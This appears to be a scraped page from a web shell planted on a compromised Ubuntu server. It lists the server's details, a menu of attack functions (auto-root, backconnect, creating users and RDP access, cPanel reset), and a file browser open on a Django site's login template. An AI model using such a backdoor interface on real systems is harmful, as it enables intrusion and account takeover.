Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
vicas-dev /
myproject /
templates /
[ HOME SHELL ]
Name
Size
Permission
Action
Gallery.html
8.07
KB
-rw-r--r--
base.html
4.88
KB
-rw-r--r--
blogs.html
309
B
-rw-r--r--
contact.html
3.2
KB
-rw-r--r--
fullwidth.html
191
B
-rw-r--r--
index.html
7.19
KB
-rw-r--r--
index1.html
54.46
KB
-rw-r--r--
login.html
1.88
KB
-rw-r--r--
members.html
4.77
KB
-rw-r--r--
navbar.html
10.48
KB
-rw-r--r--
navbar.html-bk
7.15
KB
-rw-r--r--
register.html
1.65
KB
-rw-r--r--
sidebar_left.html
308
B
-rw-r--r--
sidebar_right.html
308
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : login.html
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <title>Login</title> <script src="https://cdn.tailwindcss.com"></script> </head> <body class="h-screen bg-cover bg-center" style=" background-image: url('https://source.unsplash.com/random/1920x1080/?mountains'); " > <div class="flex items-center justify-center h-full"> <div class="bg-black bg-opacity-50 p-10 rounded-lg shadow-lg w-96 text-white" > <h2 class="text-2xl font-bold text-center mb-6">Login</h2> <form method="POST"> {% csrf_token %} <div class="mb-4"> <label class="block mb-2">Enter your username</label> <input name="username" class="w-full p-2 rounded bg-gray-800 border border-gray-600 text-white focus:outline-none focus:ring-2 focus:ring-blue-500" /> </div> <div class="mb-4"> <label class="block mb-2">Enter your password</label> <input type="password" name="password" class="w-full p-2 rounded bg-gray-800 border border-gray-600 text-white focus:outline-none focus:ring-2 focus:ring-blue-500" /> </div> <div class="flex items-center justify-between mb-4"> <label class="flex items-center"> <input type="checkbox" class="mr-2" /> Remember me </label> <a href="#" class="text-blue-400 hover:underline" >Forgot password?</a > </div> <button type="submit" class="w-full p-2 bg-blue-600 rounded text-white hover:bg-blue-700" > Log In </button> </form> <!-- Register Link --> </div> </div> </body> </html>
Close